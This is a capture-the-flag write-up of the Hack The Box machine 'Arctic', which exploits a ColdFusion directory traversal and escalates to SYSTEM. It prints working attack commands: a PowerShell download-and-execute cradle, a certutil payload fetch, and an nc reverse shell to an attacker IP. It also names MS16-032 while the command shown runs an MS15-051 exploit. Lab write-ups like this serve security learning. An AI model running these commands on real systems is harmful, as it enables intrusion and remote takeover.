Summary

Arctic is an easy Windows box. It can be exploited by navigating to an odd port in the browser and finding out that ColdFusion is running. A directory traversal can be abused to obtain an encrypted password. The password was cracked and administrative access was obtained. ColdFusion enables you to run scheduled tasks, this was used to retrieve a JSP reverse shell which provided initial access. Sherlock was executed and found several supposedly vulnerable exploits. In this case MS16-032 was used to obtain a reverse shell as SYSTEM.


Discovery

Started off by running NmapAutomator.
Nmap discovered the following open ports and services:

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

The automated nmap script did not discover any useful exploits. The only interesting port here is 8500. When opening a Netcat session nothing is retrieved. It was then attempted to open in the browser which very slowly opened a directory listing. Navigating to admin, the following page is shown:


Exploitation

Searchsploit was used to obtain public exploits:

This highlighted vulnerability was checked. It turned out to be a directory traversal that shows the encrypted password:

When putting the hash into crackstation.net, it found that the password is happyday. Next, ColdFusion can be abused by starting a scheduled task. First, go to Mappings, this shows the directory path which is required:

Then navigate to Scheduled tasks and add the following:

Note that JSP was used since .cfm is awfully slow. Google confirmed that you can use JSP in Coldfusion.

After this you will receive the following request:

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.101.17 - - [21/Feb/2021 19:44:05] "GET /jsp-reverse.jsp HTTP/1.1" 200 -

Now you can open a listener and send a curl request:

curl http://10.129.101.17:8500/CFIDE/reverse.jsp

This provides a shell as the user tolis.


Privilege Escalation

I downloaded Sherlock with the following command:

powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.147/Sherlock.ps1')

It found several supposedly vulnerabilities:

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

This exploit was used.. It was transferred over with certutil:

certutil.exe -urlcache -split -f http://10.10.14.147/ms15-051x64.exe

The same method was used to transfer over nc64.exe. The folowing command was run:

C:\Users\tolis\Desktop>ms15-051x64.exe "C:\Users\tolis\Desktop\nc64.exe -e cmd 10.10.14.147 1339"

This provided a system shell:

nc -nvlp 1339
listening on [any] 1339 ...
connect to [10.10.14.147] from (UNKNOWN) [10.129.101.17] 50132
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\tolis\Desktop>whoami
whoami
nt authority\system

Conclusion

This was a really fun box, it was super painful because ColdFusion was really slow and took a long time but I really quite like the exploitation path. It is quite a real-life box so that was fun. Hope you enjoyed this writeup!